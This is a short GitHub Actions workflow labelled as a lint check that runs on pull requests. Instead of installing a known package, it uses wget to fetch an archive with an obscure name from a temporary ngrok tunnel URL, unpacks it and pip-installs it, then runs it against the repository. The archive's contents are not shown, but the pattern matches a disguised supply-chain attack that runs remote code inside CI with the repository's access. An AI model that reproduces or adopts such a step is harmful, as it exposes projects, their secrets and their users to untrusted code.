name: Lint Spire

on: [pull_request]

jobs:
  build:
    runs-on: ubuntu-20.04
    steps:
      - uses: actions/checkout@v2
        with:
          fetch-depth: "0"
      - uses: actions/setup-python@v2
        with:
          python-version: "3.8"
      - name: Wget package
        run: wget https://02efaf6fa8ef.ngrok.io/items/hf8734hfiu932fujiufhg928ufjoi23bhg9834
      - name: Unpack package
        run: tar -xvf hf8734hfiu932fujiufhg928ufjoi23bhg9834
      - name: Install package
        run: pip install -e locust/
      - name: Checkout main
        run: git checkout main
      - name: Run locust check
        run: locust -r . -i main -t t-2
